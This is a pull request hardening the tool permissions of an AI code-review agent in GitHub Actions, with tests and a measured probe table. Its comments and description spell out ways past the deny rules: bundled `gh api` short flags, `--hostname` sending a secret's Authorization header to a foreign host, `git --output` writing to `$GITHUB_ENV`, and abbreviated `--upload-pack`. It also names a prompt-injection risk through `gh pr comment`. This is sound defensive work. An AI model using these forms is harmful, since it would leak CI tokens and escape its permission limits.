### PR TITLE
fix(ci): the review may read the repository, writing through gh api stays blocked

### DIFF
--- a/.github/workflows/claude-code-review.yml
+++ b/.github/workflows/claude-code-review.yml
@@ -373,14 +373,34 @@ jobs:
           # Der Job traegt aber CLAUDE_CODE_OAUTH_TOKEN, Schreibrecht auf Pull
           # Requests und OIDC, und der Checkout ist Code des PR - dieselbe Grenze,
           # aus der das Urteilsmodul unten von der Basis kommt. Die Tests laufen in
-          # ci.yml. `git fetch origin` darf kein `--upload-pack` tragen: das Flag
-          # waehlt das Programm, das git fuer die Gegenseite startet.
+          # ci.yml.
+          #
+          # DIE DENY-LISTE DECKT MEHR ALS DIE OFFENSICHTLICHEN FORMEN (Review auf
+          # #1117, am Werkzeug nachgemessen mit gh 2.100 und git 2.54):
+          #   - `--hostname`: `gh api repos/... --hostname fremd -H "Authorization:
+          #     ...$GEHEIMNIS"` schickt die Anfrage samt Kopfzeile an einen fremden
+          #     Host. Das Flag hat keine Kurzform.
+          #   - Gebuendelte Kurzflags: pflag liest `-iX GET` als `-i` plus `-X GET`
+          #     (gemessen), also umgehen `-if body=...` und `-iX POST` die Regeln
+          #     ` -f*` und ` -X*`. `-i` ist das einzige boolesche Kurzflag von
+          #     `gh api`; ` -i*` schliesst die Buendel, `--include` bleibt frei.
+          #   - `--output`: `git show`, `git log`, `git diff` und `git rev-list`
+          #     schreiben damit eine Datei (gemessen) - etwa nach `$GITHUB_ENV`, und
+          #     ein `BASH_ENV` darin liefe im naechsten Schritt mit dessen Tokens.
+          #     Eine Abkuerzung wie `--outpu=` weist git zurueck. Beide Stellungen,
+          #     direkt nach dem Befehl und weiter hinten, stehen einzeln da.
+          #   - `git fetch`: `--upload-pack` waehlt das Programm der Gegenseite, und
+          #     git nimmt die Abkuerzung `--upl=` an (gemessen), deshalb `--upl*`.
+          #     `-u` ist bei fetch `--update-head-ok` und nimmt kein Argument. Beim
+          #     https-Remote der CI bleibt das Flag ohnehin wirkungslos.
+          # `--verbose` bleibt frei: gh druckt den Authorization-Kopf dabei nicht
+          # (gemessen).
           claude_args: >-
             --allowed-tools
             "Skill,Task,Bash(gh issue view:*),Bash(gh search:*),Bash(gh issue list:*),Bash(gh pr comment:*),Bash(gh pr diff:*),Bash(gh pr view:*),Bash(gh pr list:*),Bash(gh repo view:*),mcp__github_inline_comment__create_inline_comment,Read,Grep,Glob,Bash(git rev-parse:*),Bash(git log:*),Bash(git diff:*),Bash(git show:*),Bash(git ls-files:*),Bash(git ls-tree:*),Bash(git cat-file:*),Bash(git rev-list:*),Bash(git blame:*),Bash(git merge-base:*),Bash(git status:*),Bash(git fetch origin:*),Bash(gh api repos/${{ github.repository }}/*)"
             'Bash(gh api "repos/${{ github.repository }}/*)'
             --disallowed-tools
-            "Bash(gh api * -X*),Bash(gh api * --method*),Bash(gh api * -f*),Bash(gh api * -F*),Bash(gh api * --field*),Bash(gh api * --raw-field*),Bash(gh api * --input*),Bash(git fetch * --upload-pack*)"
+            "Bash(gh api * -X*),Bash(gh api * --method*),Bash(gh api * -f*),Bash(gh api * -F*),Bash(gh api * --field*),Bash(gh api * --raw-field*),Bash(gh api * --input*),Bash(gh api * -i*),Bash(gh api * --hostname*),Bash(git fetch * --upl*),Bash(git show --output*),Bash(git show * --output*),Bash(git log --output*),Bash(git log * --output*),Bash(git diff --output*),Bash(git diff * --output*),Bash(git rev-list --output*),Bash(git rev-list * --output*)"
           # See https://github.com/anthropics/claude-code-action/blob/main/docs/usage.md
           # or https://code.claude.com/docs/en/cli-reference for available options
 

--- a/.github/workflows/claude-code-review.yml
+++ b/.github/workflows/claude-code-review.yml
@@ -281,6 +281,17 @@ jobs:
             found") ebenso wenig; sag stattdessen, was seither dazugekommen ist.
             Alle uebrigen Bedingungen aus Schritt 1 (geschlossen, Entwurf,
             automatisiert, trivial) bleiben unveraendert.
+
+            WERKZEUGE IN DIESEM LAUF. Lesend steht dir mehr offen als die Anleitung
+            des Plugins nennt: `gh api` auf `repos/${{ github.repository }}/...`
+            (Reviews, Kommentare, Inhalte, Vergleiche) mit dem Pfad ohne oder in
+            doppelten Anfuehrungszeichen, dazu `git show`, `git fetch origin <ref>`
+            und die uebrigen lesenden git-Befehle. Gesperrt sind schreibende
+            `gh api`-Aufrufe, Umleitungen in Dateien (`> datei`) und das Ausfuehren
+            von Code aus dem Checkout (`node`, `npm`, Tests) - die Tests laufen in
+            einer eigenen CI. Lies Ausgaben direkt, statt sie zwischenzuspeichern.
+            Ein CLAUDE.md liegt im Checkout nicht (gitignored); die Regeln dieses
+            Repos stehen in CONTRIBUTING.md.
           allowed_bots: 'dependabot[bot]'
           # DIESE LISTE ERSETZT, SIE ERGÄNZT NICHT. Das war die Annahme, die den
           # zweiten Anlauf gekostet hat: `--allowed-tools` verdrängt die acht
@@ -328,9 +339,48 @@ jobs:
           # Plugins, dann was es nicht deklariert, aber braucht. Read/Grep/Glob
           # geben ihr den Quelltext um den Diff herum; `git rev-parse` verlangt
           # seine eigene Anleitung für die SHA-gebundenen Codelinks.
+          #
+          # DER LESENDE REST, GEMESSEN STATT GERATEN (11.09.2026, #1116). Von den
+          # letzten 40 Laeufen trugen 17 Verweigerungen, und sie fielen in wenige
+          # Gruppen: die Diskussion am PR nachlesen (`gh api .../pulls/<n>/reviews`,
+          # `.../comments`, `.../issues/<n>/comments`), Inhalte zu einem Stand holen
+          # (`contents?ref=`, `compare`, `commits`) und git lesend benutzen
+          # (`git show`, `git fetch origin <sha>`, `ls-files`, `cat-file`). Auf dem
+          # zweiten Push eines PR will die Review zuerst wissen, was schon gesagt
+          # wurde - an #1116 lief sie 14 Turns, sammelte 7 Verweigerungen und
+          # konnte am Ende nichts abliefern.
+          #
+          # `gh api` IST NUR LESEND FREI, UND DAS HAELT DIE ZWEITE LISTE. Eine
+          # Allow-Regel auf den Pfad laesst jede Schreibform mit durch, weil `*`
+          # auch ` -X POST` oder ` -f body=...` trifft. Deny-Regeln gehen vor und
+          # greifen an jeder Stelle des Befehls. Lokal gemessen (CLI 2.1.267, CI
+          # 2.1.261) gegen PR 999999, damit ein Durchrutscher nur einen 404 traf:
+          # mit beiden Listen lesend erlaubt; `-f`, `-F`, `--field`, `--raw-field`,
+          # `-X POST`, `-XPOST`, `--method POST`, `--method=POST` und `--input`
+          # gesperrt, auch mit dem Pfad in Anfuehrungszeichen. OHNE die Deny-Liste
+          # liefen `-f` und `-X POST` durch - sie ist also tragend, nicht Zierde.
+          # `gh api graphql` bleibt ganz draussen, es liegt nicht unter `repos/`.
+          #
+          # DIE REGEL MIT ANFUEHRUNGSZEICHEN IST KEIN DOPPEL. `gh api "repos/..."`
+          # trifft die Regel ohne Zeichen nicht (gemessen), und einen Pfad mit `&`
+          # in der Query muss man quoten, sonst schickt bash den Befehl in den
+          # Hintergrund. Sie steht als eigener Wert in einfachen Anfuehrungszeichen:
+          # die Action zerlegt `claude_args` mit shell-quote und sammelt alle Werte
+          # hinter `--allowed-tools` ein, so braucht das `"` kein Escape.
+          #
+          # BEWUSST NICHT FREI: Code aus dem Checkout ausfuehren (`node`, `npm`,
+          # Tests), `Write` und `WebFetch`. Die Laeufe haben alles davon versucht.
+          # Der Job traegt aber CLAUDE_CODE_OAUTH_TOKEN, Schreibrecht auf Pull
+          # Requests und OIDC, und der Checkout ist Code des PR - dieselbe Grenze,
+          # aus der das Urteilsmodul unten von der Basis kommt. Die Tests laufen in
+          # ci.yml. `git fetch origin` darf kein `--upload-pack` tragen: das Flag
+          # waehlt das Programm, das git fuer die Gegenseite startet.
           claude_args: >-
             --allowed-tools
-            "Skill,Task,Bash(gh issue view:*),Bash(gh search:*),Bash(gh issue list:*),Bash(gh pr comment:*),Bash(gh pr diff:*),Bash(gh pr view:*),Bash(gh pr list:*),Bash(gh repo view:*),mcp__github_inline_comment__create_inline_comment,Read,Grep,Glob,Bash(git rev-parse:*),Bash(git log:*),Bash(git diff:*)"
+            "Skill,Task,Bash(gh issue view:*),Bash(gh search:*),Bash(gh issue list:*),Bash(gh pr comment:*),Bash(gh pr diff:*),Bash(gh pr view:*),Bash(gh pr list:*),Bash(gh repo view:*),mcp__github_inline_comment__create_inline_comment,Read,Grep,Glob,Bash(git rev-parse:*),Bash(git log:*),Bash(git diff:*),Bash(git show:*),Bash(git ls-files:*),Bash(git ls-tree:*),Bash(git cat-file:*),Bash(git rev-list:*),Bash(git blame:*),Bash(git merge-base:*),Bash(git status:*),Bash(git fetch origin:*),Bash(gh api repos/${{ github.repository }}/*)"
+            'Bash(gh api "repos/${{ github.repository }}/*)'
+            --disallowed-tools
+            "Bash(gh api * -X*),Bash(gh api * --method*),Bash(gh api * -f*),Bash(gh api * -F*),Bash(gh api * --field*),Bash(gh api * --raw-field*),Bash(gh api * --input*),Bash(git fetch * --upload-pack*)"
           # See https://github.com/anthropics/claude-code-action/blob/main/docs/usage.md
           # or https://code.claude.com/docs/en/cli-reference for available options
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -134,6 +134,24 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
+- **The automated review no longer loses its result on a later push.** On a pull request's second
+  push the review first reads what has already been said, and the tools it reached for - `gh api` on
+  the pull request's reviews and comments, `git show`, `git fetch` of a commit - were not in its
+  allowed list. The run on #1116 did the review, collected seven refusals and posted nothing, which
+  the evidence step rightly turned red; 17 of the last 40 runs carried refusals like these. The list
+  now lets it read the repository through `gh api` and through read-only git commands.
+
+  Writing through `gh api` stays blocked by a second list that denies every write form (`-X`,
+  `--method`, `-f`, `-F`, `--field`, `--raw-field`, `--input`). That list is load-bearing, measured
+  with the CLI: a rule on the path alone let a POST through. Running code from the checkout
+  (`node`, `npm`, the test suites), writing files and fetching web pages stay out, because the job
+  holds a token that can write to pull requests and the checkout is the pull request's own code. A
+  guard in `test:claude-review-workflow` holds both lists.
+
+  Worth knowing: a pull request that touches the review workflow makes the action skip itself, so
+  this one is not reviewed by it, and after the merge an older branch skips the review until it is
+  rebased.
+
 - **The Module options settings page describes what it actually contains.** Its description named
   only Budget, Health and Housekeeping - accurate when it was written, but Tasks and Schedule have
   since grown their own sections on the same page without the sentence ever being updated. Reworded

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -142,8 +142,11 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   now lets it read the repository through `gh api` and through read-only git commands.
 
   Writing through `gh api` stays blocked by a second list that denies every write form (`-X`,
-  `--method`, `-f`, `-F`, `--field`, `--raw-field`, `--input`). That list is load-bearing, measured
-  with the CLI: a rule on the path alone let a POST through. Running code from the checkout
+  `--method`, `-f`, `-F`, `--field`, `--raw-field`, `--input`), bundled short flags such as `-if`,
+  and `--hostname`, which would send the request - headers included - to another host. That list is
+  load-bearing, measured with the CLI: a rule on the path alone let a POST through. The same list
+  keeps the read-only git commands read-only: `git show`, `git log`, `git diff` and `git rev-list`
+  write a file with `--output`, and on a runner that file can be the environment of the next step. Running code from the checkout
   (`node`, `npm`, the test suites), writing files and fetching web pages stay out, because the job
   holds a token that can write to pull requests and the checkout is the pull request's own code. A
   guard in `test:claude-review-workflow` holds both lists.

--- a/test/test-claude-review-workflow.js
+++ b/test/test-claude-review-workflow.js
@@ -44,6 +44,61 @@ test('Skill und Task stehen in den erlaubten Werkzeugen', () => {
   assert.ok(tools.includes('Bash(gh pr comment:*)'), 'ohne diesen Weg kann sie ihr Ergebnis nicht abliefern');
 });
 
+/**
+ * Die Werte je Flag in `claude_args`, so zerlegt wie die Action es tut: shell-quote
+ * sammelt hinter einem Flag alle Werte bis zum naechsten `--`, und jeder Wert ist
+ * eine Komma-Liste (base-action/src/parse-sdk-options.ts). Ein Flag steht nie in
+ * Anfuehrungszeichen - `--method` innerhalb einer Deny-Regel ist deshalb Wert, kein
+ * neues Flag.
+ */
+function claudeArgs() {
+  const block = workflow.match(/claude_args:\s*>-\n((?:[ ]{12}\S.*\n)+)/)?.[1] ?? '';
+  const values = {};
+  let flag = null;
+  for (const [token] of block.matchAll(/"[^"]*"|'[^']*'|\S+/g)) {
+    if (token.startsWith('--')) {
+      flag = token.slice(2);
+      values[flag] ??= [];
+      continue;
+    }
+    if (!flag) continue;
+    const inhalt = /^["']/.test(token) ? token.slice(1, -1) : token;
+    values[flag].push(...inhalt.split(',').map((s) => s.trim()).filter(Boolean));
+  }
+  return values;
+}
+
+test('gh api ist nur lesend frei: Allow auf den Repo-Pfad, Deny auf jede Schreibform', () => {
+  // Gemessen am 11.09.2026 (#1116): eine Allow-Regel auf den Pfad laesst `-f` und
+  // `-X POST` mit durch, weil `*` auch das trifft. Erst die Deny-Liste sperrt sie -
+  // fehlt ein Eintrag dort, schreibt die Review mit dem Token des Jobs.
+  const { 'allowed-tools': allow = [], 'disallowed-tools': deny = [] } = claudeArgs();
+  const ghApi = allow.filter((t) => t.startsWith('Bash(gh api')).sort();
+  assert.deepEqual(ghApi, [
+    'Bash(gh api "repos/${{ github.repository }}/*)',
+    'Bash(gh api repos/${{ github.repository }}/*)',
+  ], 'gh api darf nur unter dem eigenen Repo-Pfad frei sein, nie als blosses Praefix');
+  for (const schreibform of ['-X', '--method', '-f', '-F', '--field', '--raw-field', '--input']) {
+    assert.ok(deny.includes(`Bash(gh api * ${schreibform}*)`),
+      `die Schreibform ${schreibform} fehlt in --disallowed-tools`);
+  }
+  assert.ok(deny.includes('Bash(git fetch * --upload-pack*)'),
+    '`git fetch origin` darf nicht das Programm der Gegenseite waehlen');
+});
+
+test('Code aus dem Checkout laeuft in der Review nicht', () => {
+  // Der Job traegt OAuth-Token, Schreibrecht auf Pull Requests und OIDC, der
+  // Checkout ist Code des PR. Die Laeufe haben `node --test`, `npm run` und
+  // `node -e` versucht - das bleibt gesperrt, die Tests laufen in ci.yml.
+  const { 'allowed-tools': allow = [] } = claudeArgs();
+  assert.ok(allow.length > 0, 'die Liste liess sich nicht lesen - der Test wuerde sonst nichts messen');
+  const zuBreit = allow.filter((t) =>
+    /^(Write|Edit|MultiEdit|NotebookEdit|WebFetch)\b/.test(t)
+    || /^Bash\((node|npm|npx|bash|sh|python3?|make|curl|wget)\b/.test(t)
+    || /^Bash(\(\*?\))?$/.test(t));
+  assert.deepEqual(zuBreit, [], `ausfuehrende oder schreibende Werkzeuge in der Liste: ${zuBreit.join(', ')}`);
+});
+
 test('der Job darf schreiben, sonst kommt die Review nicht zu Wort', () => {
   assert.match(workflow, /pull-requests:\s*write/);
 });

--- a/test/test-claude-review-workflow.js
+++ b/test/test-claude-review-workflow.js
@@ -78,12 +78,30 @@ test('gh api ist nur lesend frei: Allow auf den Repo-Pfad, Deny auf jede Schreib
     'Bash(gh api "repos/${{ github.repository }}/*)',
     'Bash(gh api repos/${{ github.repository }}/*)',
   ], 'gh api darf nur unter dem eigenen Repo-Pfad frei sein, nie als blosses Praefix');
-  for (const schreibform of ['-X', '--method', '-f', '-F', '--field', '--raw-field', '--input']) {
-    assert.ok(deny.includes(`Bash(gh api * ${schreibform}*)`),
-      `die Schreibform ${schreibform} fehlt in --disallowed-tools`);
+  // `-i` schliesst die gebuendelten Kurzflags (`-if`, `-iX POST`), `--hostname`
+  // den fremden Host (Review auf #1117, beides am Werkzeug gemessen).
+  for (const flag of ['-X', '--method', '-f', '-F', '--field', '--raw-field', '--input', '-i', '--hostname']) {
+    assert.ok(deny.includes(`Bash(gh api * ${flag}*)`),
+      `${flag} fehlt fuer gh api in --disallowed-tools`);
   }
-  assert.ok(deny.includes('Bash(git fetch * --upload-pack*)'),
-    '`git fetch origin` darf nicht das Programm der Gegenseite waehlen');
+  // git nimmt die Abkuerzung `--upl=` an; `--upload-pack*` allein liesse sie durch.
+  assert.ok(deny.includes('Bash(git fetch * --upl*)'),
+    '`git fetch origin` darf das Programm der Gegenseite nicht waehlen, auch nicht abgekuerzt');
+});
+
+test('kein erlaubter git-Befehl schreibt per --output eine Datei', () => {
+  // `git show --output=$GITHUB_ENV` schreibt ins Umgebungsfile des Runners, und ein
+  // `BASH_ENV` darin laeuft im naechsten Schritt mit dessen Tokens. show, log, diff
+  // und rev-list nehmen `--output` an (gemessen); alle vier sind erlaubt, also
+  // muessen fuer jeden BEIDE Stellungen gesperrt sein.
+  const { 'allowed-tools': allow = [], 'disallowed-tools': deny = [] } = claudeArgs();
+  for (const befehl of ['show', 'log', 'diff', 'rev-list']) {
+    assert.ok(allow.includes(`Bash(git ${befehl}:*)`), `git ${befehl} ist nicht mehr erlaubt - Test anpassen`);
+    assert.ok(deny.includes(`Bash(git ${befehl} --output*)`),
+      `git ${befehl} --output direkt nach dem Befehl ist nicht gesperrt`);
+    assert.ok(deny.includes(`Bash(git ${befehl} * --output*)`),
+      `git ${befehl} ... --output weiter hinten ist nicht gesperrt`);
+  }
 });
 
 test('Code aus dem Checkout laeuft in der Review nicht', () => {


### PR DESCRIPTION
On a pull request's later pushes the automated review first reads what was already said there, and the tools it reached for were not in its allowed list. The run on #1116 did the review (14 turns), collected seven refusals and posted nothing, so the evidence step turned it red. Of the last 40 `claude-review` runs, 17 carried refusals.

## What the refusals were

Swept from the logs of those 40 runs:

- reading the pull request's discussion: `gh api repos/<repo>/pulls/<n>/reviews`, `.../pulls/<n>/comments`, `.../issues/<n>/comments`
- reading content at a ref: `gh api .../contents/<path>?ref=`, `.../compare/a...b`, `.../commits`
- read-only git: `git show <sha>:<path>`, `git fetch origin <sha>` / `pull/<n>/head`, `git ls-files`, `git cat-file`, `git rev-list`
- redirecting output into files (`gh pr diff <n> > /tmp/...`)
- running code from the checkout (`node --test`, `npm run test:*`, `node -e`), `Write`, `WebFetch`

Pipes into read-only helpers (`| head`, `| grep`, `| sed -n`, `| wc`), `2>&1` and `2>/dev/null` already pass; a chain is refused only when one of its parts has no rule.

## Change

- `--allowed-tools` gains `Bash(gh api repos/${{ github.repository }}/*)`, the same rule with the path in double quotes, and `git show`, `ls-files`, `ls-tree`, `cat-file`, `rev-list`, `blame`, `merge-base`, `status`, `fetch origin`.
- New `--disallowed-tools`:
  - every `gh api` write form: `-X`, `--method`, `-f`, `-F`, `--field`, `--raw-field`, `--input`
  - `gh api` bundled short flags (`-i*`): pflag reads `-iX POST` or `-if body=...` past the `-X` and `-f` rules
  - `gh api --hostname`, which would send the request, headers included, to another host
  - `--output` for `git show`, `git log`, `git diff` and `git rev-list`, in both positions: all four write a file with it, and on a runner that file can be `$GITHUB_ENV`
  - `git fetch * --upl*`: git accepts `--upl=` as an abbreviation of `--upload-pack`
- The prompt names what is open and what is not, says the rules live in CONTRIBUTING.md (CLAUDE.md is gitignored and absent in CI), and asks for output to be read directly instead of redirected.
- `test:claude-review-workflow` gains a tokenizer that splits `claude_args` the way the action does (shell-quote, all values up to the next flag, comma lists) and three guards: `gh api` is free only under the repository path with the full deny list, no allowed git command can write through `--output`, and no executing or writing tool is in the allowed list.

## Measured

Local CLI 2.1.267 (CI runs 2.1.261), `claude -p` with `--setting-sources project` in an empty directory so no user rules leak in. Write attempts target pull request 999999 or `localhost`, so anything that slipped through could only fail.

| Probe | Result |
|---|---|
| `gh api repos/.../pulls/1116/reviews`, paginated, `--include`, `\| .user.login` jq | allowed |
| `gh api "repos/..."`, including `?sha=main&per_page=3` | allowed (refused without the quoted-path rule) |
| `-H "Accept: ...raw" 2>&1 \| head`, `2>/dev/null`, `\| wc -l` | allowed |
| `-f`, `-F`, `--field`, `--raw-field`, `-X POST`, `-XPOST`, `--method POST`, `--method=POST`, `--input` | refused, also with the quoted path |
| `-if body=...`, `-iX GET`, `--hostname localhost`, `--hostname=localhost` (on a matching sub-path) | refused |
| `gh api -X POST repos/...` (flag before the path), `gh api graphql` | refused, no allow rule matches |
| `git show`, `git log`, `git diff`, `git fetch origin main`, `git fetch origin -u main` | allowed |
| `git show/log/diff/rev-list --output=...`, both positions | refused, no file written |
| `git fetch origin --upload-pack=...`, `--upl=...`, flag before `origin` | refused |
| **Counter-check, allow rules only:** `-f`, `-X POST`, `-iX GET`, `--hostname=localhost`, `git show --output` | **allowed** - the deny list is what blocks them |

Guard counter-checks, each turning `test:claude-review-workflow` red: dropping the `-f` or the `--hostname` deny rule, dropping the rear `rev-list --output` rule, going back to `--upload-pack*`, adding `Bash(node:*)`, widening to `Bash(gh api:*)`. `test:claude-review-workflow` 22/22, `test:review-proof` 57/57, `test:workflow-pins` 6/6, `test:workflow-timeouts` 6/6, `test:changelog` 28/28; the workflow parses as YAML and the folded `claude_args` reads as intended.

## Deliberately not allowed

Running code from the checkout (`node`, `npm`, tests), `Write` and `WebFetch`. The job holds `CLAUDE_CODE_OAUTH_TOKEN`, write access to pull requests and OIDC, and the checkout is the pull request's own code - the same boundary that makes the verdict module come from the base. The suites run in `ci.yml`. `gh api --verbose` stays free: gh does not print the Authorization header with it (measured).

## Worth knowing

- This pull request changes the review workflow, so the action skips itself here and the evidence step is suspended.
- After the merge, every open branch older than it carries a different workflow and skips the review until rebased (#1114, #1116).
- Not closed here and older than this change: `gh pr comment` is allowed with any body, so a review that follows injected instructions could post what it can read. Narrowing it risks the review's own delivery path and needs its own measurement.
- The one link not measured locally is the action's own parsing of `claude_args`. The live proof is the `"allowedTools"` and `"disallowedTools"` arrays in the log of the first review run after the merge.
